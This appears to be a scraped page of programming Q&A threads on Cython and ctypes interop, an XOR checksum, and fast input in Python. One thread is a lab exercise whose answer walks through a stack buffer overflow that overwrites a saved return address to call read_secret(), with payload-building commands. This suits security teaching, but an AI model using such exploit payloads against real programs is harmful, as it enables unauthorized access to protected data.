Cython print() outputs before C printf(), even when placed afterwards

I'm trying to pick up Cython.
import counter

cdef public void increment():
    counter.increment()

cdef public int get():
    return counter.get()

cdef public void say(int times):
    counter.say(times)
This is the "glue code" I'm using to call functions from counter.py, a pure Python source code file. It's laid out like this:
count = 0

def increment():
    global count
    count += 1

def get():
    global count
    return count

def say(times):
    global count
    print(str(count) * times)
I have successfully compiled and run this program. The functions work fine. However, a very strange thing occurred when I tested it:
int main(int argc, char *argv[]) {
    Py_Initialize();

    // The following two lines add the current working directory
    // to the environment variable `PYTHONPATH`. This allows us
    // to import Python modules in this directory.
    PyRun_SimpleString("import sys");
    PyRun_SimpleString("sys.path.append(\".\")");

    PyInit_glue();

    // Tests
    for (int i = 0; i < 10; i++)
    {
        increment();
    }
    int x = get();
    printf("Incremented %d times\n", x);
    printf("The binary representation of the number 42 is");
    say(3);

    Py_Finalize();
    return 0;
}
I would expect the program to produce this output:
Incremented 10 times
The binary representation of the number 42 is
101010
However, it prints this:
Incremented 10 times
101010
The binary representation of the number 42 is
But if I change the line
printf("The binary representation of the number 42 is");
to
printf("The binary representation of the number 42 is\n");
then the output is corrected.
This seems strange to me. I understand that if I want to print the output of a Python function, I might just as well return it to C and store it in a variable, and use C's printf() rather than the native Python print(). But I would be very interested to hear the reason this is happening. After all, the printf() statement is reached before the say() statement (I double checked this in gdb just to make sure). Thanks for reading.
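This interleaving is characteristic of stdio buffering rather than execution order: printf() writes into C's stdout buffer, which on a line-buffered terminal is flushed only when a newline is printed (or when the program exits), while Python's print() writes through its own sys.stdout and flushes right after its newline. That is why adding \n to the printf() "fixes" the ordering. A minimal sketch of the other common fix, assuming the setup above - explicitly draining C's buffer before calling into Python:
/* inside main(), replacing the two lines around say(3) */
printf("The binary representation of the number 42 is");
fflush(stdout);  /* force C's stdout buffer out before Python writes */
say(3);          /* Python's print() output now appears afterwards */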

Related

Data gets corrupted between C and Python

I am trying to use Cython and ctypes to call a C library function from Python, but the data bytes get corrupted somehow. Could someone please help me locate the issue?
testCRC.c:
#include <stdio.h>

unsigned char GetCalculatedCrc(const unsigned char* stream){
    printf("Stream is %x %x %x %x %x %x %x\n",
           stream[0], stream[1], stream[2], stream[3],
           stream[4], stream[5], stream[6]);
    unsigned char dummy = 0;
    return dummy;
}
wrapped.pyx:
# Exposes a C function to Python
def c_GetCalculatedCrc(const unsigned char* stream):
    return GetCalculatedCrc(stream)
test.py:
import ctypes
from wrapped import c_GetCalculatedCrc

x_ba = (ctypes.c_ubyte * 7)(*[0xD3, 0xFF, 0xF7, 0x7F, 0x00, 0x00, 0x41])
x_ca = (ctypes.c_char * len(x_ba)).from_buffer(x_ba)
y = c_GetCalculatedCrc(x_ca.value)
output:
Stream is d3 ff f7 7f 0 0 5f    # expected 0xD3,0xFF,0xF7,0x7F,0x00,0x00,0x41
Solution:
1. I had to update Cython to 0.29 to get the fix for the bug that prevented using typed memoryviews on read-only buffers.
2. It worked when passing x_ca.raw; when x_ca.value was passed instead, it threw an "out of bounds access" error.
After the suggestions from @ead & @DavidW:
.pyx:
# Exposes a C function to Python
def c_GetCalculatedCrc(const unsigned char[:] stream):
    print "received %s\n" % stream[6]
    return GetCalculatedCrc(&stream[0])
test.py:
x_ba = (ctypes.c_ubyte * 8)(*[0x47, 0xD3, 0xFF, 0xF7, 0x7F, 0x00, 0x00, 0x41])
x_ca = (ctypes.c_char * len(x_ba)).from_buffer(x_ba)
y = c_GetCalculatedCrc(x_ca.raw)
output:
Stream is 47 d3 ff f7 7f 0 0 41
As pointed out by @DavidW, the problem is the usage of x_ca.value: every time x_ca.value is accessed, a new bytes object is created (see the documentation) and the memory is copied:
x_ca.value is x_ca.value
# False -> a new object is created on every access
However, when the memory is copied, the \0 character is treated as the end of the string (as is typical for C strings), as can be seen in the source code:
static PyObject *
CharArray_get_value(CDataObject *self, void *Py_UNUSED(ignored))
{
    Py_ssize_t i;
    char *ptr = self->b_ptr;
    for (i = 0; i < self->b_size; ++i)
        if (*ptr++ == '\0')
            break;
    return PyBytes_FromStringAndSize(self->b_ptr, i);
}
Thus the result of x_ca.value is a bytes object of length 4, which doesn't share memory with x_ca - so when you access stream[6] it leads to undefined behavior: anything could happen (including a crash).
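A quick way to see this (a sketch, using the 7-byte x_ca from the question):
len(x_ca.value)  # 4 - the copy stops at the first \0
len(x_ca.raw)    # 7 - .raw copies the whole buffer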
So what can be done?
Normally you cannot have a pointer argument in a def function at all, but char * is an exception: a bytes object can be automatically converted to char *. This conversion, however, doesn't happen via the buffer protocol but via PyBytes_AsStringAndSize.
This is the reason why you cannot pass x_ca to c_GetCalculatedCrc as it is: x_ca implements the buffer protocol, but it is not a bytes object, so PyBytes_AsStringAndSize cannot be applied.
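To illustrate the distinction (a minimal sketch; takes_pointer is a hypothetical name):
%%cython
def takes_pointer(const unsigned char* stream):
    return stream[0]

# takes_pointer(bytes(x_ca))  # works: bytes is converted via PyBytes_AsStringAndSize
# takes_pointer(x_ca)         # TypeError: x_ca is not a bytes object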
An alternative is to use a typed memory view, which utilizes the buffer protocol, i.e.
%%cython
def c_GetCalculatedCrc(const unsigned char[:] stream):
    print(stream[6])
and now passing x_ca directly, with original length/content:
c_GetCalculatedCrc(x_ca)
# 65 as expected
Another alternative would be to pass x_ca.raw to a function expecting const unsigned char * as argument, as @DavidW pointed out in the comments; unlike x_ca.value, x_ca.raw copies the whole buffer without stopping at the first \0. However, I would prefer typed memory views - they are safer than raw pointers, and you won't run into surprising undefined behavior.

Buffer overflow attack, executing an uncalled function

So, I'm trying to exploit a program that has a buffer overflow vulnerability in order to reach the secret behind a locked .txt file (printed by read_secret()).
vulnerable.c //no edits here
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

void read_secret() {
    FILE *fptr = fopen("/task2/secret.txt", "r");
    char secret[1024];
    fscanf(fptr, "%512s", secret);
    printf("Well done!\nThere you go, a wee reward: %s\n", secret);
    exit(0);
}

int fib(int n)
{
    if (n == 0)
        return 0;
    else if (n == 1)
        return 1;
    else
        return (fib(n - 1) + fib(n - 2));
}

void vuln(char *name)
{
    int n = 20;
    char buf[1024];
    int f[n];
    int i;
    for (i = 0; i < n; i++) {
        f[i] = fib(i);
    }
    strcpy(buf, name);
    printf("Welcome %s!\n", buf);
    for (i = 0; i < 20; i++) {
        printf("By the way, the %dth Fibonacci number might be %d\n", i, f[i]);
    }
}

int main(int argc, char *argv[])
{
    if (argc < 2) {
        printf("Tell me your names, tricksy hobbitses!\n");
        return 0;
    }
    // printf("main function at %p\n", main);
    // printf("read_secret function at %p\n", read_secret);
    vuln(argv[1]);
    return 0;
}
attack.c //to be edited
#!/usr/bin/env bash
/task2/vuln "$(python -c "print 'a' * 1026")"
I know I can cause a segfault if I pass a large enough string, but that doesn't get me anywhere. I'm trying to get the program to execute read_secret() by overwriting the return address on the stack, so that vuln() returns into read_secret instead of back to main.
But I'm pretty stuck here. I know I would have to use GDB to get the address of the read_secret function, and that I would have to replace the saved return address (which points back into main()) with read_secret's address, but I'm not sure how.
Thanks
If you want to execute a function through a buffer overflow vulnerability, you first have to identify the offset at which you can get a segfault; in your case I assume it's 1026. The whole game is to overwrite the saved EIP (which tells the program what to execute next) with an address of your own.
To find the address of the target function, open your program in gdb and type:
x read_secret
Then copy the address. You then have to convert it to little- or big-endian format; I do it with the struct module in Python:
import struct
struct.pack("<I", address)  # "<I" packs little-endian; big-endian would be ">I"
Then you have to add it to your input to the binary, something like:
/task2/vuln "$(python -c "print 'a' * 1026 + 'the_address'")"
# on a bash shell, not in a script
If all of this doesn't work, just add a few more characters to your offset - there might be something you didn't see coming.
/task2/vuln "$(python -c "print 'a' * 1034 + 'the_address'")"
Hope that answers your question.
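Putting the pieces together, here is a sketch of building the payload in a file (the address value is hypothetical - use the one gdb reports for read_secret):
import struct

offset = 1026                         # padding up to the saved return address
addr = struct.pack("<I", 0x080484b6)  # hypothetical read_secret address, little-endian
payload = b"a" * offset + addr

with open("payload", "wb") as f:
    f.write(payload)
Then invoke the binary with it: /task2/vuln "$(cat payload)".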

Python: XOR each character in a string

I'm trying to validate a checksum on a string which in this case is calculated by performing an XOR on each of the individual characters.
Given my test string:
check_against = "GPGLL,5300.97914,N,00259.98174,E,125926,A"
I figured it would be as simple as:
result = 0
for char in check_against:
    result = result ^ ord(char)
I know the result should be 28, however my code gives 40.
I'm not sure what encoding the text is supposed to be in, although I've tried encoding/decoding in UTF-8 and ASCII, both with the same result.
I implemented this same algorithm in C by simply doing an XOR over the char array with perfect results, so what am I missing?
Edit
It was a little while ago that I implemented (what I thought was) the same thing in C. I knew it was in an Objective-C project, but I assumed I had done it the same way. Totally wrong: first there was a step where I converted the checksum string value at the end to hex, like so (I'm filling some things in here so that I'm only pasting what is relevant):
unsigned int checksum = 0;
NSScanner *scanner = [NSScanner scannerWithString:@"26"];
[scanner scanHexInt:&checksum];
Then I did the following to compute the checksum:
NSString *sumString = @"GPGLL,5300.97914,N,00259.98174,E,125926,A";
unsigned int sum = 0;
for (int i = 0; i < sumString.length; i++) {
    sum = sum ^ [sumString characterAtIndex:i];
}
Then I would just compare like so:
return sum == checksum;
So, as @metatoaster, @XD573, and some others in the comments helped figure out, the issue was the difference in bases: the computed result is in base 10, while the value I was comparing against is in base 16.
The result of the code, 40, is correct - in base 10. The value I was trying to achieve, 28, is given in base 16. Converting it from base 16 to base 10, for example like so:
int('28', 16)
gives 40, the computed result.
# python3
s = "GPGLL,5300.97914,N,00259.98174,E,125926,A"
cks = 0
i = 0
while i < len(s):
    cks ^= ord(s[i])
    i += 1
print("hex:", hex(cks))
print("dec:", cks)
I created the C version as shown here:
#include <stdio.h>
#include <string.h>

int main()
{
    char* str1 = "GPGLL,5300.97914,N,00259.98174,E,125926,A";
    int sum = 0;
    int i;
    for (i = 0; i < strlen(str1); i++) {
        sum ^= str1[i];
    }
    printf("checksum: %d\n", sum);
    return 0;
}
And when I compiled and ran it:
$ gcc -o mytest mytest.c
$ ./mytest
checksum: 40
Which leads me to believe that the assumptions you have from your equivalent C code are incorrect.

Python Fast Input Output Using Buffer Competitive Programming

I have seen people use buffered reading in different languages for fast input/output on online judges. For example, this problem (http://www.spoj.pl/problems/INTEST/) is solved in C like this:
#include <stdio.h>
#define size 50000

int main(void) {
    unsigned int n = 0, k, t;
    char buff[size];
    unsigned int divisible = 0;
    int block_read = 0;
    int j;
    t = 0;
    scanf("%u %u\n", &t, &k);
    while (t) {
        block_read = fread(buff, 1, size, stdin);
        for (j = 0; j < block_read; j++) {
            if (buff[j] == '\n') {
                t--;
                if (n % k == 0) {
                    divisible++;
                }
                n = 0;
            } else {
                n = n * 10 + (buff[j] - '0');
            }
        }
    }
    printf("%u", divisible);
    return 0;
}
How can this be done in Python?
import sys

file = sys.stdin
size = 50000
t = 0
while t != 0:
    block_read = file.read(size)
    ...
    ...
Most probably this will not increase performance, though - Python is an interpreted language, so you basically want to spend as much time in native code (the standard library's input/parsing routines, in this case) as possible.
TL;DR: either use the built-in routines to parse integers or get some third-party library that is optimized for speed.
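As a concrete illustration, a sketch of the buffered approach in Python 3 (one bulk read plus the built-in int parsing; the input layout follows the INTEST problem above):
import sys

def main():
    data = sys.stdin.buffer.read().split()  # one bulk read, split on whitespace
    t, k = int(data[0]), int(data[1])
    # count how many of the t numbers are divisible by k
    divisible = sum(1 for tok in data[2:2 + t] if int(tok) % k == 0)
    sys.stdout.write(str(divisible))

if __name__ == "__main__":
    main()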
I tried solving this one in Python 3 and couldn't get it to work no matter how I tried reading the input. I then switched to running it under Python 2.5 so I could use
import psyco
psyco.full()
After making that change I was able to get it to work by simply reading input from sys.stdin one line at a time in a for loop. I read the first line using raw_input() and parsed the values of n and k, then used the following loop to read the remainder of the input.
for line in sys.stdin:
    count += not int(line) % k

ctypes outputting unknown value at end of correct values

I have the following DLL ('arrayprint.dll') function that I want to use in Python via ctypes:
__declspec(dllexport) void PrintArray(int* pArray) {
    int i;
    for (i = 0; i < 5; pArray++, i++) {
        printf("%d\n", *pArray);
    }
}
My Python script is as follows:
from ctypes import *
fiveintegers = c_int * 5
x = fiveintegers(2,3,5,7,11)
px = pointer(x)
mydll = CDLL('arrayprint.dll')
mydll.PrintArray(px)
The final function call outputs the following:
2
3
5
7
11
2226984
What is the 2226984 and how do I get rid of it? It doesn't look to be the decimal value for the memory address of the DLL, x, or px.
Thanks,
Mike
(Note: I'm not actually using PrintArray for anything; it was just the easiest example I could find that generated the same behavior as the longer function I'm using.)
mydll.PrintArray.restype = None
mydll.PrintArray(px)
By default ctypes assumes the function returns a C int, so the call evaluates to whatever garbage value happens to be left in the return register; setting restype to None tells ctypes that the function returns void, which makes the stray number disappear.
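Declaring the argument types as well is good practice; a minimal sketch of the full declaration (assuming the same arrayprint.dll as above, and passing the array directly, since ctypes accepts an array where a pointer to its element type is expected):
from ctypes import CDLL, POINTER, c_int

fiveintegers = c_int * 5
x = fiveintegers(2, 3, 5, 7, 11)

mydll = CDLL('arrayprint.dll')
mydll.PrintArray.restype = None               # the C function returns void
mydll.PrintArray.argtypes = [POINTER(c_int)]  # and takes an int*
mydll.PrintArray(x)                           # prints exactly the five values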
